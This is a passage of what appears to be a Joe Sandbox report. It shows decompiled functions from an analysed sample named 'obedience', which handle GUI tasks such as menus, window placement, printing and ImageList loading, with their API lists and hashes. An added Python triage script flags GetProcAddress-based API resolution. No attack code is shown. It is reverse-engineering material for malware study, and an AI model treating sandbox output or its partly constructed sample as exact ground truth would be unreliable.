      						_t64 = _t56 - 2;
      						if(_t64 == 0) {
      							_t66 = E0047950C(_t112,  *((intOrPtr*)(_t124 + 0xc)));
      							E00473FE4(_t66, E0042D290(E0044B158(_t112),  *((intOrPtr*)(_t124 + 0xc))));
      							_t73 =  *((intOrPtr*)( *_t112 + 0x124))();
      							__eflags = _t73;
      							if(_t73 != 0) {
      								 *((intOrPtr*)( *_t112 + 0x7c))();
      							}
      						} else {
      							if(_t64 == 0x12c) {
      								_push(E00407A1C(GetMessagePos()) & 0x0000ffff);
      								_t80 = GetMessagePos();
      								_pop(_t132);
      								E00406DA4(_t80 & 0x0000ffff,  &_v12, _t132);
      								E0044446C(_t112,  &_v40,  &_v12);
      								_push(_v40.y);
      								_t148 = ChildWindowFromPoint(E0044B158(_t112), _v40.x);
      								__eflags = _t148;
      								if(_t148 != 0) {
      									_t89 = E0044B158(_t112);
      									__eflags = _t148 - _t89;
      									if(_t148 != _t89) {
      										E0040508C( &_v16, 0x50);
      										_t93 = E00404D00(_v16);
      										E0040508C( &_v16, GetClassNameA(_t148, E00404F00(_v16), _t93));
      										E00404E4C(_v16, "SysHeader32");
      										if(__eflags == 0) {
      											E0044446C(_t112,  &_v40,  &_v12);
      											_v32 = _v40;
      											_v28 = _v40.y;
      											_t106 = SendMessageA(_t148, 0x1206, 1,  &_v32);
      											__eflags = _t106;
      											if(_t106 >= 0) {
      												E0047950C(_t112, _v20);
      												E00403DF8(_t112, __eflags);
      											}
      										}
      									}
      								}
      							}
      						}
      					}
      					goto L22;
      				}
      			}

      APIs
      • GetMessagePos.USER32 ref: 00476A93
      • GetMessagePos.USER32 ref: 00476AA1
      • ChildWindowFromPoint.USER32 ref: 00476ACD
      • GetClassNameA.USER32(00000000,00000000,00000000), ref: 00476B0B
      • SendMessageA.USER32 ref: 00476B4E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Message$ChildClassFromNamePointSendWindow
      • String ID: SysHeader32
      • API String ID: 2510305242-2725536604
      • Opcode ID: cf21ce0e7569bf682f7d3d3bcad9d5888024a682015ca43439950e6ed2defd22
      • Instruction ID: 47be30efa61cfac26e4ce42d5826feb7008f8c8c0e167b874e09279044384e2b
      • Opcode Fuzzy Hash: cf21ce0e7569bf682f7d3d3bcad9d5888024a682015ca43439950e6ed2defd22
      • Instruction Fuzzy Hash: 74519130B009155BC711EF7AC8829EEB3B6AF85344B15C57BE809E7352DB3CED058A98
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 58%
      			E0047377C(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _v8;
      				int _v12;
      				intOrPtr _v16;
      				long _v20;
      				void* _v36;
      				signed int _v40;
      				signed int _v44;
      				signed int _v48;
      				signed int _v52;
      				intOrPtr _v56;
      				void* _v60;
      				void* _v76;
      				signed int _t73;
      				signed int _t75;
      				signed int _t89;
      				signed int _t115;
      				signed int _t119;
      				void* _t123;
      				intOrPtr _t124;
      				signed int _t125;
      				long _t126;
      				intOrPtr _t137;
      				signed int _t141;
      				void* _t144;
      				void* _t147;
      				void* _t149;
      				void* _t151;
      				void* _t154;
      				void* _t155;
      				intOrPtr _t156;
      				void* _t157;
      
      				_t157 = __eflags;
      				_t154 = _t155;
      				_t156 = _t155 + 0xffffffb8;
      				_push(__edi);
      				_t123 = __edx;
      				_v8 = __eax;
      				E00403498( &_v60, 0x30);
      				_t147 = E0042FC9C();
      				_t3 = _t147 + 0x18; // 0x18
      				E00404A94(_t3, _t123);
      				E0042F404(_t147, 0, __edi, _t147, _t154, _t157);
      				_t124 = E0042F7A0(_t147);
      				_v60 = _t124;
      				_v56 = _t124;
      				_push(0x58);
      				_t73 = E0042F7A0(_t147);
      				_push(_t73);
      				L00407348();
      				_t125 = _t73;
      				_push(0x5a);
      				_t75 = E0042F7A0(_t147);
      				_push(_t75);
      				L00407348();
      				_t141 = _t75;
      				if(E00406E0C(_v8 + 0x278) == 0) {
      					asm("cdq");
      					_v52 =  *(_v8 + 0x278) * 0x5a0 / _t125;
      					asm("cdq");
      					_v48 =  *(_v8 + 0x27c) * 0x5a0 / _t141;
      					asm("cdq");
      					_v44 =  *(_v8 + 0x280) * 0x5a0 / _t125;
      					_t89 =  *(_v8 + 0x284) * 0x5a0;
      					asm("cdq");
      					__eflags = _t89 % _t141;
      					_v40 = _t89 / _t141;
      				} else {
      					_t115 = E0042F7D0(_t147);
      					asm("cdq");
      					_v44 = _t115 * 0x5a0 / _t125;
      					_t119 = E0042F7B4(_t147);
      					asm("cdq");
      					_v40 = _t119 * 0x5a0 / _t141;
      				}
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				_t149 = _t147;
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				_t151 = _t149;
      				_t126 = 0;
      				_t144 = E0044489C();
      				_v16 = 0xffffffff;
      				_v12 = SetMapMode(_v60, 1);
      				SendMessageA(E0044B158(_v8), 0x439, 0, 0);
      				_push(_t154);
      				_push(0x473943);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t156;
      				while(1) {
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t144 = _t144;
      					_t151 = _t151;
      					_v20 = _t126;
      					_t126 = SendMessageA(E0044B158(_v8), 0x439, 1,  &_v60);
      					if(_t144 > _t126) {
      						_t161 = _t126 - 0xffffffff;
      						if(_t126 != 0xffffffff) {
      							E0042F4C0(_t151, _t161);
      						}
      					}
      					if(_t144 <= _t126) {
      						break;
      					}
      					_t163 = _t126 - 0xffffffff;
      					if(_t126 != 0xffffffff) {
      						continue;
      					}
      					break;
      				}
      				E0042F48C(_t151, _t163);
      				_pop(_t137);
      				 *[fs:eax] = _t137;
      				_push(0x47394a);
      				SendMessageA(E0044B158(_v8), 0x439, 0, 0);
      				return SetMapMode(_v60, _v12);
      			}

      APIs
        • Part of subcall function 0042F404: SetAbortProc.GDI32(?,Function_0002EE70), ref: 0042F46D
        • Part of subcall function 0042F404: StartDocA.GDI32(?), ref: 0042F477
        • Part of subcall function 0042F404: StartPage.GDI32(?), ref: 0042F480
      • 73BEAD70.GDI32(00000000,00000058), ref: 004737CA
      • 73BEAD70.GDI32(00000000,0000005A,00000000,00000058), ref: 004737DB
      • SetMapMode.GDI32(?,00000001), ref: 00473898
      • SendMessageA.USER32 ref: 004738B2
      • SendMessageA.USER32 ref: 004738EA
        • Part of subcall function 0042F7D0: 73BEAD70.GDI32(?,00000008,00000000,004737FA,00000000,0000005A,00000000,00000058), ref: 0042F7E2
        • Part of subcall function 0042F7B4: 73BEAD70.GDI32(?,0000000A,00000000,0047380D,00000000,0000005A,00000000,00000058), ref: 0042F7C6
      • SendMessageA.USER32 ref: 00473930
      • SetMapMode.GDI32(?,?), ref: 0047393D
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend$ModeStart$AbortPageProc
      • String ID:
      • API String ID: 1188224737-0
      • Opcode ID: 9f3041c70fba00ea1216353b92736ad3caf1914057131e12a6dc37c3536e7c8f
      • Instruction ID: 65423c92b975faf8eb5231db35d91a7dc78b31b34161e393dce898ecf0d2ecf0
      • Opcode Fuzzy Hash: 9f3041c70fba00ea1216353b92736ad3caf1914057131e12a6dc37c3536e7c8f
      • Instruction Fuzzy Hash: 8C51D8B1B00614AADB00EFAADC86ACEB7F4EF45714F90053AF504FB2C1D6799E058B59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 69%
      			E0044C7D0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr* _v8;
      				void _v12;
      				intOrPtr _v16;
      				int _v24;
      				int _v28;
      				intOrPtr _v32;
      				char _v36;
      				intOrPtr* _t80;
      				intOrPtr _t91;
      				void* _t119;
      				intOrPtr _t136;
      				intOrPtr _t145;
      				void* _t148;
      
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				_t119 = __ecx;
      				_v8 = __eax;
      				_t145 =  *0x48f9b8; // 0x490b80
      				 *((char*)(_v8 + 0x210)) = 1;
      				_push(_t148);
      				_push(0x44c9a9);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t148 + 0xffffffe0;
      				E00444958(_v8, __ecx, __ecx, _t145);
      				_v16 = _v16 + 4;
      				E00445B8C(_v8,  &_v28);
      				if(E00461FF8() <  *(_v8 + 0x4c) + _v24) {
      					_v24 = E00461FF8() -  *(_v8 + 0x4c);
      				}
      				if(E00462004() <  *(_v8 + 0x48) + _v28) {
      					_v28 = E00462004() -  *(_v8 + 0x48);
      				}
      				if(E00461FEC() > _v28) {
      					_v28 = E00461FEC();
      				}
      				if(E00461FE0() > _v16) {
      					_v16 = E00461FE0();
      				}
      				SetWindowPos(E0044B158(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
      				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404D00(_t119) < 0x64 &&  *0x48ebd4 != 0) {
      					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
      					if(_v12 != 0) {
      						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
      						if(_v12 == 0) {
      							E0044FAB8( &_v36);
      							if(_v32 <= _v24) {
      							}
      						}
      						 *0x48ebd4(E0044B158(_v8), 0x64,  *0x0048ECDC | 0x00040000);
      					}
      				}
      				_t80 =  *0x48f840; // 0x490b7c
      				_t45 =  *_t80 + 0x30; // 0xe036e
      				E00448864(_v8,  *_t45);
      				ShowWindow(E0044B158(_v8), 4);
      				 *((intOrPtr*)( *_v8 + 0x7c))();
      				_pop(_t136);
      				 *[fs:eax] = _t136;
      				_push(0x44c9b0);
      				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
      				_t91 = _v8;
      				 *((char*)(_t91 + 0x210)) = 0;
      				return _t91;
      			}

      APIs
      • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0044C9A9), ref: 0044C8B5
      • GetTickCount.KERNEL32 ref: 0044C8BA
      • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0044C8F5
      • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0044C90D
      • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0044C953
      • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0044C9A9), ref: 0044C976
        • Part of subcall function 0044FAB8: GetCursorPos.USER32(?,?,0044C929,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 0044FABC
      • GetTickCount.KERNEL32 ref: 0044C990
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
      • String ID:
      • API String ID: 3024527889-0
      • Opcode ID: 117c01754b1dacfc69b53c6c22e6783539ed2adab1de2d06d1d681dba916e921
      • Instruction ID: be4374f3b2aacd31ed3cb822cd117ae7d5c676763d0dc55d632e4d107d918ed2
      • Opcode Fuzzy Hash: 117c01754b1dacfc69b53c6c22e6783539ed2adab1de2d06d1d681dba916e921
      • Instruction Fuzzy Hash: 29512B74A00205EFEB50EF99C986E9EB7F4AF08304F24456AF500EB351D779AE40DB99
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 70%
      			E004298B8(void* __eax, void* __edx) {
      				BYTE* _v8;
      				int _v12;
      				struct HDC__* _v16;
      				short _v18;
      				signed int _v24;
      				short _v26;
      				short _v28;
      				char _v38;
      				void* __ebx;
      				void* __ebp;
      				signed int _t35;
      				struct HDC__* _t43;
      				void* _t65;
      				intOrPtr _t67;
      				intOrPtr _t77;
      				void* _t80;
      				void* _t83;
      				void* _t85;
      				intOrPtr _t86;
      
      				_t83 = _t85;
      				_t86 = _t85 + 0xffffffdc;
      				_t80 = __edx;
      				_t65 = __eax;
      				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
      					return __eax;
      				} else {
      					E00403498( &_v38, 0x16);
      					_t67 =  *((intOrPtr*)(_t65 + 0x28));
      					_v38 = 0x9ac6cdd7;
      					_t35 =  *((intOrPtr*)(_t67 + 0x18));
      					if(_t35 != 0) {
      						_v24 = _t35;
      					} else {
      						_v24 = 0x60;
      					}
      					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
      					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
      					_t43 = E00427C60( &_v38);
      					_v18 = _t43;
      					_push(0);
      					L00407658();
      					_v16 = _t43;
      					_push(_t83);
      					_push(0x4299f3);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t86;
      					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
      					_v8 = E00402ACC(_v12, 0, 0x16);
      					_push(_t83);
      					_push(0x4299d3);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t86;
      					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
      						E00426E50(_t67);
      					}
      					E0041C408(_t80, 0x16,  &_v38);
      					E0041C408(_t80, _v12, _v8);
      					_pop(_t77);
      					 *[fs:eax] = _t77;
      					_push(0x4299da);
      					return E00402AFC(_v8);
      				}
      			}

      APIs
      • MulDiv.KERNEL32(?,?,000009EC), ref: 0042990A
      • MulDiv.KERNEL32(?,?,000009EC), ref: 00429921
      • 73BEAC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00429938
      • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004299F3,?,00000000,?,?,000009EC,?,?,000009EC), ref: 0042995C
      • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004299D3,?,?,00000000,00000000,00000008,?,00000000,004299F3), ref: 0042998F
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: BitsFileMeta
      • String ID: `
      • API String ID: 858000408-2679148245
      • Opcode ID: 2a14881c2344e325fdca05f12335808e363eb3b8c2717b9dbcd8998f77520079
      • Instruction ID: 187f2ec53fa7709c87e6992b5ef46663259db01b626e0ac298fe9cfbf8bfdd96
      • Opcode Fuzzy Hash: 2a14881c2344e325fdca05f12335808e363eb3b8c2717b9dbcd8998f77520079
      • Instruction Fuzzy Hash: BA318575B14208ABDB00DFD5D882AEEB7B8EF09714F50405AF904FB381D678AE40D769
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 54%
      			E00452C50(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				void* __ecx;
      				intOrPtr _t9;
      				void* _t11;
      				intOrPtr _t17;
      				void* _t28;
      				void* _t29;
      				intOrPtr _t33;
      				intOrPtr _t34;
      				intOrPtr _t37;
      				struct HINSTANCE__* _t41;
      				void* _t43;
      				intOrPtr _t45;
      				intOrPtr _t46;
      
      				_t45 = _t46;
      				_push(_t29);
      				_push(__ebx);
      				_t43 = __edx;
      				_t28 = __eax;
      				if( *0x490b64 == 0) {
      					 *0x490b64 = E0040D444("comctl32.dll", __eax, _t29);
      					if( *0x490b64 >= 0x60000) {
      						_t41 = GetModuleHandleA("comctl32.dll");
      						if(_t41 != 0) {
      							 *0x490b68 = GetProcAddress(_t41, "ImageList_WriteEx");
      						}
      					}
      				}
      				_v8 = E004231B8(_t43, 1, 0);
      				_push(_t45);
      				_push(0x452d4a);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t46;
      				if( *0x490b68 == 0) {
      					_t9 = _v8;
      					if(_t9 != 0) {
      						_t9 = _t9 - 0xffffffec;
      					}
      					_push(_t9);
      					_t11 = E00451B70(_t28);
      					_push(_t11);
      					L0042D084();
      					if(_t11 == 0) {
      						_t33 =  *0x48f6e4; // 0x423ad8
      						E0040CCA8(_t33, 1);
      						E004043D0();
      					}
      				} else {
      					_t17 = _v8;
      					if(_t17 != 0) {
      						_t17 = _t17 - 0xffffffec;
      					}
      					_push(_t17);
      					_push(1);
      					_push(E00451B70(_t28));
      					if( *0x490b68() != 0) {
      						_t34 =  *0x48f6e4; // 0x423ad8
      						E0040CCA8(_t34, 1);
      						E004043D0();
      					}
      				}
      				_pop(_t37);
      				 *[fs:eax] = _t37;
      				_push(0x452d51);
      				return E00403BF0(_v8);
      			}

      APIs
        • Part of subcall function 0040D444: 739F14E0.VERSION(00000000,?,00000000,0040D51A), ref: 0040D486
        • Part of subcall function 0040D444: 739F14C0.VERSION(00000000,?,00000000,?,00000000,0040D4FD,?,00000000,?,00000000,0040D51A), ref: 0040D4BB
        • Part of subcall function 0040D444: 739F1500.VERSION(?,0040D52C,?,?,00000000,?,00000000,?,00000000,0040D4FD,?,00000000,?,00000000,0040D51A), ref: 0040D4D5
      • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00452C84
      • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00452C95
      • 6F8DCEF0.COMCTL32(00000000,?,00000000,00452D4A), ref: 00452D14
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressF1500HandleModuleProc
      • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
      • API String ID: 3659472037-3125200627
      • Opcode ID: 70998badef0836917bf35ba26e2c9acd9c5180b3a82ebbd7cc9cc4f205320971
      • Instruction ID: a5d84d4efbb52a92d7a536b4030e6093e8669bc67846a6e460128813c7fd1739
      • Opcode Fuzzy Hash: 70998badef0836917bf35ba26e2c9acd9c5180b3a82ebbd7cc9cc4f205320971
      • Instruction Fuzzy Hash: 2C215E31A046009BD714AB75EE55B2E36B99B5671EB50053BFC04D72A3D6BDEC08C62C
      Uniqueness

      Uniqueness Score: -1.00%
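
Added triage example, not part of the Joe Sandbox report or of the analysed sample: a small Python script that reads the per-function "APIs" lists in the form this report prints them and flags functions that look up APIs at run time. The pattern it looks for is the one E00452C50 shows above: a GetProcAddress call with a literal name (ImageList_WriteEx) followed by a call the decompiler can only name by address (6F8DCEF0.COMCTL32), which is the resolved pointer being invoked. The sample input is constructed from three of the APIs blocks on this page and trimmed; the function and field names are mine, and the "C-Code - Quality" line is used as the marker that the next line is a function signature.

```python
"""Triage helper for Joe Sandbox "C-Code" dumps: collect the API list printed
under each decompiled function and flag run-time API resolution (GetProcAddress
with a literal name, plus a direct call the decompiler names only by address).
Added example; the function and field names below are assumptions, not report API."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: three APIs blocks in the shape this report prints them,
# trimmed to a few lines each.  Not the full report.
SAMPLE_REPORT = """\
C-Code - Quality: 100%
\t\t\tE00452C50(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
APIs
  • Part of subcall function 0040D444: 739F14E0.VERSION(00000000,?,00000000,0040D51A), ref: 0040D486
• GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00452C84
• GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00452C95
• 6F8DCEF0.COMCTL32(00000000,?,00000000,00452D4A), ref: 00452D14
C-Code - Quality: 47%
\t\t\tE0042D93C(intOrPtr _a4, intOrPtr* _a8) {
APIs
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042D994
• GetSystemMetrics.USER32 ref: 0042D9A9
• lstrcpy.KERNEL32(?,DISPLAY), ref: 0042D9DE
  • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
C-Code - Quality: 100%
\t\t\tE0040CB24(void* __edx, void* __edi, void* __fp0) {
APIs
• CharToOemA.USER32 ref: 0040CB5B
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040CB78
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CB7E
• MessageBoxA.USER32 ref: 0040CBD1
"""

QUALITY_RE = re.compile(r"^\s*C-Code - Quality:")          # precedes every function signature
FUNC_RE = re.compile(r"^\s*E(?P<addr>[0-9A-F]{8})\(")        # e.g. E00452C50(...)
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
ADDR_RE = re.compile(r"^[0-9A-F]{8}$")                      # a "name" that is really an address


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                        # address of the call site
    subcall: Optional[str] = None   # helper address when the call sits in a subcall


def parse_api_blocks(text: str) -> Dict[str, List[ApiCall]]:
    """Map each function address (e.g. '00452C50') to the API calls listed under it."""
    calls: Dict[str, List[ApiCall]] = {}
    current: Optional[str] = None
    expect_header = False
    for line in text.splitlines():
        if QUALITY_RE.match(line):
            expect_header = True        # the next line is the function signature
            continue
        if expect_header:
            expect_header = False
            m = FUNC_RE.match(line)
            if m:
                current = m.group("addr")
                calls.setdefault(current, [])
            continue
        m = API_RE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls[current].append(ApiCall(m.group("name"), m.group("module"),
                                          args, m.group("ref"), m.group("sub")))
    return calls


def resolved_names(calls: List[ApiCall]) -> List[str]:
    """Literal names handed to GetProcAddress in the function body itself."""
    out = []
    for c in calls:
        if c.name == "GetProcAddress" and c.subcall is None and len(c.args) >= 2:
            target = c.args[1]
            if target not in ("", "?") and not ADDR_RE.match(target):
                out.append(target)
    return out


def address_only_calls(calls: List[ApiCall]) -> List[str]:
    """Direct calls the decompiler names only by address: a call through a
    pointer filled in at run time, typically the value GetProcAddress returned."""
    return [f"{c.name}.{c.module}" for c in calls
            if c.subcall is None and ADDR_RE.match(c.name)]


def triage(text: str) -> Dict[str, Dict[str, List[str]]]:
    """Functions worth a second look: what they resolve and what they call blind."""
    flagged: Dict[str, Dict[str, List[str]]] = {}
    for func, calls in parse_api_blocks(text).items():
        names, blind = resolved_names(calls), address_only_calls(calls)
        if names or blind:
            flagged[func] = {"resolves": names, "address_only_calls": blind}
    return flagged


if __name__ == "__main__":
    for func, info in triage(SAMPLE_REPORT).items():
        print(f"E{func}: resolves={info['resolves']} "
              f"address_only_calls={info['address_only_calls']}")
```

On the sample this flags only E00452C50. E0042D93C also ends up calling a resolved pointer, but its GetProcAddress sits inside the helper E0042D52C and the name ("GetMonitorInfoA") is passed in the decompiled body rather than in the APIs line, so the script cannot see it from the API list alone; that case still needs the body read by hand. The same blind spot applies to any function that resolves imports by hash instead of by name.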

      C-Code - Quality: 100%
      			E00454BCC(int __eax, void* __edx) {
      				signed int _t39;
      				signed int _t40;
      				intOrPtr _t44;
      				int _t46;
      				int _t47;
      				intOrPtr* _t48;
      
      				_t18 = __eax;
      				_t48 = __eax;
      				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
      					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
      						 *((char*)(__eax + 0x74)) = 1;
      						return __eax;
      					}
      					_t19 =  *((intOrPtr*)(__eax + 0x6c));
      					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
      						return E00454BCC(_t19, __edx);
      					}
      					_t18 = GetMenuItemCount(E00454CFC(__eax));
      					_t47 = _t18;
      					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
      					while(_t47 > 0) {
      						_t46 = _t47 - 1;
      						_t18 = GetMenuState(E00454CFC(_t48), _t46, 0x400);
      						if((_t18 & 0x00000004) == 0) {
      							_t18 = RemoveMenu(E00454CFC(_t48), _t46, 0x400);
      							_t40 = 1;
      						}
      						_t47 = _t47 - 1;
      					}
      					if(_t40 != 0) {
      						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
      							L14:
      							E00454A8C(_t48);
      							L15:
      							return  *((intOrPtr*)( *_t48 + 0x3c))();
      						}
      						_t44 =  *0x4536e0; // 0x45372c
      						if(E00403D88( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00454CFC(_t48)) != 0) {
      							goto L14;
      						} else {
      							DestroyMenu( *(_t48 + 0x34));
      							 *(_t48 + 0x34) = 0;
      							goto L15;
      						}
      					}
      				}
      				return _t18;
      			}

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID: ,7E
      • API String ID: 0-1487369149
      • Opcode ID: 036d76f8616a9aaa1f8043c2c2e8c8d4c72f579aa24b4f2ac027887370311283
      • Instruction ID: 7472404e42371f2cc0cd4b42d6e909d223251953db317e230c0b66a5cd1c0cee
      • Opcode Fuzzy Hash: 036d76f8616a9aaa1f8043c2c2e8c8d4c72f579aa24b4f2ac027887370311283
      • Instruction Fuzzy Hash: 01119321B0620566DA21AE7A8905B5B36985FC175FF06042BFC029F393CE7CEC8D826C
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 47%
      			E0042D93C(intOrPtr _a4, intOrPtr* _a8) {
      				void _v20;
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				void* _t23;
      				int _t24;
      				intOrPtr _t26;
      				intOrPtr _t27;
      				intOrPtr* _t29;
      				intOrPtr* _t31;
      
      				_t29 = _a8;
      				_t27 = _a4;
      				if( *0x490931 != 0) {
      					_t24 = 0;
      					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
      						 *((intOrPtr*)(_t29 + 4)) = 0;
      						 *((intOrPtr*)(_t29 + 8)) = 0;
      						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
      						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						_t31 = _t29;
      						 *(_t31 + 0x24) = 1;
      						if( *_t31 >= 0x4c) {
      							_push("DISPLAY");
      							_push(_t31 + 0x28);
      							L00407238();
      						}
      						_t24 = 1;
      					}
      				} else {
      					_t26 =  *0x490918; // 0x42d93c
      					 *0x490918 = E0042D52C(5, _t23, "GetMonitorInfoA", _t26, _t29);
      					_t24 =  *0x490918(_t27, _t29);
      				}
      				return _t24;
      			}

      APIs
      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042D994
      • GetSystemMetrics.USER32 ref: 0042D9A9
      • GetSystemMetrics.USER32 ref: 0042D9B4
      • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042D9DE
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
